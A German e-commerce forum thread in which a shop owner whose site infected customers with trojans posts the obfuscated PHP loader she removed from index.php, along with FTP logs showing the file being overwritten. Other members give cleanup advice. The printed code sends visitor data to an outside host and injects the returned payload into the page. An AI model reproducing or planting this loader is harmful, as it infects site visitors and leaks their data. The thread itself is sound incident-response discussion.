Probleme mit Malware . . .

KathiLe

Sehr aktives Mitglied
31. August 2009
2.899
9
Hallo,

habe von einer Kundin gestern morgen folgende Mitteilung erhalten:

> Vielen Dank für die Zusendung des Kleids und der anderen Teile.
> mir ist aufgefallen, dass ich nach Besuch Ihrer Website sogenannte
> Malware
> (Trojaner) auf meinem Computer hatte. Nach Bereinigung durch meinen
> IT-Fachmann, hatte ich sofort wieder die gleichen Trojaner auf meinem
> Computer, als ich auf Ihre Website ging. Könnten Sie Ihre Seite bitte
> überprüfen lassen, da anscheinend jemand dort bösartige Software
> versteckt hat.
> Gibt es eine Möglichkeit, seitens HostEurope meine Daten zu scannen?
> Vielen Dank für eine schnelle Rückmeldung und viele Grüße
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Auf Anfrage teilte mir Hosteurope dann folgendes mit:

In der index.php findet sich ab Zeile 178/179 etwas seltsamer Code. Zumindest gibt es base64-codierten Quelltext welcher hier vermutlcih nicht hingehört. Innerhalb dieses Codes wird ab

http://botstatisticupdate.com/stat/stat.php

zugegriffen (Zeile 190). Wenn Ihnen diese Domain nichts sagt, ist das vermutlich der Schadcode.

Wir haben Ihnen die FTP-Logfileauszüge der letzten 7 Tage in das Root Verzeichnis Ihres Webpacks gelegt. Sie können diese Daten per FTP abrufen.
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Wenn dieser Link da nicht hingehört - wo kommt der her und kann ich den einfach in der index.php löschen, ohne dass er wieder auftaucht?
 

MBesancon

Administrator
Mitarbeiter
1. Oktober 2010
2.082
217
Erkelenz
AW: Probleme mit Malware . . .

Du solltest deine FTP-Passwörter ändern. Möglicherweise kam es über diesen Weg.

Auf jeden Fall gehört dieser Code NICHT in die Datei und sollte sofort entfernt werden!
 

Freaky

Sehr aktives Mitglied
7. Mai 2009
1.331
104
AW: Probleme mit Malware . . .

Was sagt denn der Shopdateien-Check? Der müsste doch da was festgestellt haben oder?
 

KathiLe

Sehr aktives Mitglied
31. August 2009
2.899
9
AW: Probleme mit Malware . . .

Nee, der hat nichts außergewöhnliches entdeckt.
Ich habe jetzt folgenden Code aus der index.php entfernt:

<?phpif (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Und die log-Datei von Hosteurope zeigte mir folgendes an:

Auszug der Transferlogs zum FTP-Account 1160504:
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:06 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:07 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:24 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:25 +0200] "-"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:26 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:27 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:28 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:29 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Betrifft also unsere beiden Shops - wer bitte ist "softlayer"?
 

ag-websolutions.de

Sehr aktives Mitglied
29. Dezember 2009
14.548
233
AW: Probleme mit Malware . . .

ich würde es nicht bei einer Bereinigung der index.php belassen....

sichere die config.ini.php und das template-verzeichnis und setze den shop neu auf ...

wenn nämlich in anderen dateien noch schadcode steckt ... ist dein shop ratz fat wieder infiziert

denke auch daran sämtliche Kennwörter zu ändern (shop-datenbank, ftp-zugang, shop-admin)
 
Du musst Dich einloggen oder registrieren um hier antworten zu können.
Ähnliche Themen
Titel Forum Antworten Datum
Neu Probleme mit Inaktive Verkaufskanäle User helfen Usern - Fragen zu JTL-Wawi 0
Neu Checkout Probleme mit Pflichtfeldangaben Allgemeine Fragen zu JTL-Shop 4
Neu Probleme mit Cache Einstellungen / HTTP 500 - memory limit exceeded JTL-Shop - Fehler und Bugs 9
Neu Probleme mit dem erstellen eines Profils in der Datenbankverwaltung JTL-Wawi - Fehler und Bugs 1
Neu Shop 5.6.1: Probleme beim Entfernen von Artikeln aus dem Warenkorb JTL-Shop - Fehler und Bugs 5
Neu Wawi Filter probleme User helfen Usern - Fragen zu JTL-Wawi 0
Neu Probleme beim Lizenzkauf im Extension Store – PayPal-Fehler? Plugins für JTL-Shop 0
Neu Bilder importieren mit "vorhandene Bilder vor dem Import entfernen und neu importieren" > eigenartiges Verhalten JTL-Ameise - Fehler und Bugs 2
Problem mit Hintergrundfarbe Einrichtung JTL-Shop5 1
Neu Artikel letzte 10 Versanddaten, sortiert nach Datum mit Plattform Eigene Übersichten in der JTL-Wawi 3
Neu Worker Abgleich mit dem Onlineshop "mit Fehlern beendet" Onlineshop-Anbindung 4
Neu JTL, was ist eigentlich los mit euch? JTL-Wawi - Fehler und Bugs 5
Gelöst Bekannte Störung: Fehler "Der Inhaltstyp text/html stimmt nicht mit text/xml überein" bei der Labelerstellung JTL-ShippingLabels - Fehler und Bugs 1
Neu BIETE: 2x Fetra 2892 Kommissionier-/Lagerwagen mit Sichtlagerkästen Dienstleistung, Jobs und Ähnliches 0
Neu Export Käuferliste mit Seriennummern User helfen Usern - Fragen zu JTL-Wawi 4
Neu Problem bei Varianten-Upload mit Amazon Lister 2.0 (Attribut-Mapping Farbe/Größe) Onlineshop-Anbindung 1
Neu Vorsicht - eComData "Upgrades" ab 01.04.2026 mit gleichzeitigem Paketwechsel verursacht teilweise 100% mehr Kosten! Smalltalk 6
Verkauf: Positionsname mit Hersteller möglich? JTL-Wawi 1.11 9
Neu Beim Versuch Paypal-Plugin mit Paypal-Konto zu verbinden Shop nicht mehr erreichbar Plugins für JTL-Shop 2
Neu Neues Plugin: Produktbundles mit Rabatten Plugins für JTL-Shop 0
Neu Für die Weiterentwicklung und Betreuung unserer bestehenden Systemlandschaft suchen wir einen erfahrenen Freelancer (m/w/d) mit fundierten Kenntnissen JTL-Wawi App 1
Update von 1.11.6 auf 1.11.7: JTL Worker verbindet nicht mehr mit Datenbank (WaWi schon) JTL-Wawi 1.11 1
Neu Repricer Erfahrungen mit JTL gesucht User helfen Usern - Fragen zu JTL-Wawi 0
Neu OSS aktiv – Ausnahme für Eventtickets mit deutschem Leistungsort möglich? Allgemeine Fragen zu JTL-Shop 6
Neu Zusatzartikel, Stückliste, Variation den Kunden direkt mit anbieten (Shop/Ebay) User helfen Usern - Fragen zu JTL-Wawi 6
Neu Kundenkonto mit UID und Bestellung als Gast JTL-Shop - Fehler und Bugs 14
Neu Sprachvariablen Textbausteine mit "." im Namen lassen sich nicht ändern JTL-Shop - Fehler und Bugs 2
Neu 12.400 Versandumschläge B4 / 6.400 Braun und 6.000 Weiß mit Faltböden / Klappböden Dienstleistung, Jobs und Ähnliches 4
Neu Kann man mit JTL Gebrauchtware verkaufen? User helfen Usern - Fragen zu JTL-Wawi 8
Neu Synchronisation mit Shop mit Fehlern beendet Onlineshop-Anbindung 17
Neu Mehrere Kartons in einem Auftrag mit nur einem DHL-Label Arbeitsabläufe in JTL-WMS / JTL-Packtisch+ 12
Neu Kunde zahlt zuviel mit PayPal Plugins für JTL-Shop 0
Neu Wawi Synchronisation mit JTL Shop nicht möglich! seit 3 Stunden was kann man machen? Onlineshop-Anbindung 1
Neu Export Kundendaten mit Label in WAWI 1.9.6.5 JTL Ameise - Eigene Exporte 1
Neu Ebay Artikel mit Fehlern / Export eBay-Anbindung - Ideen, Lob und Kritik 3
Neu Newsletter Anmeldung speichert Namen mit HTML-Entities JTL-Shop - Fehler und Bugs 1
Neu Fehler mit der Kartenzahlung Einrichtung / Updates von JTL-POS 9
Rechnung mit oder ohne ZUGFeRD XML speichern JTL-Wawi 1.11 4
Neu WMS Mobile / kein QR Code Scan in das Passwort Feld mit Zebra MDE JTL-WMS / JTL-Packtisch+ - Fehler und Bugs 0
Inaktive Amazon Angebote mit Fehlern - Preisfehler, GPSR usw. Amazon-Anbindung - Ideen, Lob und Kritik 0
Neu Samsung TAB A7 + Swissbit TSE USB-Stick mit JSAUX Adapter OTG Typ C auf USB JTL-POS - Fragen zu Hardware 1
Neu Kassenbon mit Rabatt Angabe Allgemeine Fragen zu JTL-POS 1
Artikel mit Bestand 0 ausblenden JTL-Wawi 1.9 5
Neu Übertragung an DATEV mit Besonderheit der Kasse (LS-POS) User helfen Usern - Fragen zu JTL-Wawi 0
Artikel mit Bestand einen Einkaufstop setzen JTL-Wawi 1.11 3
Neu Wechsel von JTL Shop 5 zu Shopify / ERP-Connector Produkte mit Variationen werden nicht übertragen Shopify-Connector 1
Artikel Z besteht aus den Positionen A, B und C mit unterschiedlichen Steuersätzen. Wie im Angebot, Auftrag, Rechnung richtig dargestellen ? JTL-Wawi 1.11 4
Neu Erfahrungen mit automatischen Etikettiersystemen & JTL-Integration Arbeitsabläufe in JTL-WMS / JTL-Packtisch+ 0
Erfahrungen mit JTL-Wawi 1.10.15.0 im Produktivbetrieb? JTL-Wawi 1.10 7
Neu Lieferschein entweder mit Stücklistenkomponente oder aber mit normalem Artikel ausgeben. Druck-/ E-Mail-/ Exportvorlagen in JTL-Wawi 1

Ähnliche Themen

Top Bottom